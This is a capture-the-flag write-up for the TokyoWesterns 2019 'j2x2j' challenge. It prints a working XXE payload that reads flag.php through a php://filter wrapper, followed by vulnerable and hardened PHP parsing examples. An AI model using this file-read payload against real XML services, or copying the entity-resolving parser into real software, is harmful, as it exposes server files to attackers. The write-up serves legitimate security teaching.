TokyoWesterns CTF 5th 2019: Web - j2x2j


This was a simple JSON-to-XML / XML-to-JSON converter. The challenge was categorized as “warmup”, so, not much to my surprise, the most basic XXE vulnerability worked as expected.

I used the following code (written into Chrome’s console) to leak the flag:

$.post('/', { xml: `<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT leak ANY><!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/flag.php">]><root><leak>&xxe;</leak></root>` }, function(data) { $('#json').val(atob(JSON.parse(data).leak)); });

The flag was:

TWCTF{t1ny_XXE_st1ll_ex1sts_everywhere}
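For the defensive side, here is an added example (not the challenge's source, which is not shown in this post) of how a PHP converter ends up resolving external entities and how to parse the same input safely. It assumes the service uses DOMDocument; the function names and the sample documents are hypothetical and constructed for illustration.

```php
<?php
// Added example: hypothetical converter code, not taken from the challenge.
// Vulnerable: LIBXML_NOENT makes libxml2 substitute entities, including SYSTEM ones.
function xml_to_json_vulnerable(string $xml): string
{
    $doc = new DOMDocument();
    $doc->loadXML($xml, LIBXML_NOENT);
    return json_encode(node_to_array($doc->documentElement));
}

// Hardened: no entity substitution, no network fetches, and no DOCTYPE at all.
function xml_to_json_hardened(string $xml): string
{
    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true);
    $ok = $doc->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok) {
        throw new InvalidArgumentException('malformed XML');
    }
    foreach ($doc->childNodes as $node) {
        if ($node->nodeType === XML_DOCUMENT_TYPE_NODE) {
            throw new InvalidArgumentException('DOCTYPE not allowed');
        }
    }
    return json_encode(node_to_array($doc->documentElement));
}

// Minimal conversion: child elements become keys, leaf elements become text.
function node_to_array(DOMElement $el)
{
    $out = [];
    foreach ($el->childNodes as $child) {
        if ($child instanceof DOMElement) {
            $out[$child->nodeName] = node_to_array($child);
        }
    }
    return $out ?: $el->textContent;
}

// Constructed inputs: a plain document and one declaring an internal entity.
$plain = '<root><leak>hello</leak></root>';
$withDtd = '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY e "x">]><root><leak>&e;</leak></root>';
echo xml_to_json_hardened($plain), "\n";
try {
    xml_to_json_hardened($withDtd);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Rejecting every DOCTYPE is stricter than just omitting LIBXML_NOENT, but a JSON/XML converter has no need for DTDs, and the check also blocks internal entity expansion.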
